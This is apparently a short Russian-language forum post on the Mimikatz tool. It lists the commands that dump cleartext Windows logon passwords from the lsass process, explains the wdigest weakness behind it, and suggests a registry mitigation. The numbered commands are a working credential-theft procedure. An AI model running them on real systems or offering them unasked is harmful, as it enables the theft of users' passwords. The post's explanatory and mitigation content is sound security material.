Описание:
Недавно французике разработчики выпустили свою наработку - Mimikatz. Она умеет реверсивно извлекать пароли пользователей, которые вошли в систему.
Скачать ее можно с официального сайта http://blog.gentilkiwi.com/mimikatz
Как использовать:
1) Заходим в CMD в директории Win32 или x64, если вы на 64-битной системе;
2) Запускаем Mimikatz.exe ;
3) Запускаем команду mimikatz # privilege::debug ;
4) Затем mimikatz # inject::process lsass.exe sekurlsa.dll - она введет в систему процесс lsass.exe ;
5) И напоследок mimikatz # @getLogonPasswords .
Результат выйдет на французом, но думаю вы разберетесь ;-)
Как это работает?
Подобное чудо связано с использованием поставщика безопасности wdigest, который с целью поддержки SSO хранит пароль в памяти открытым текстом (кто бы мог подумать!). Стоит ли говорить какой выхлоп для атакующего играет подобный недостаток :) К слову, парни уже прикручивают это чудо к MSF - http://pauldotcom.com/2012/02/dumping-cleartext-credentials.htmlКак устранить эту проблему?
Можно отключть wdigest через реестр по пути (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке. (Например через Meterpeter)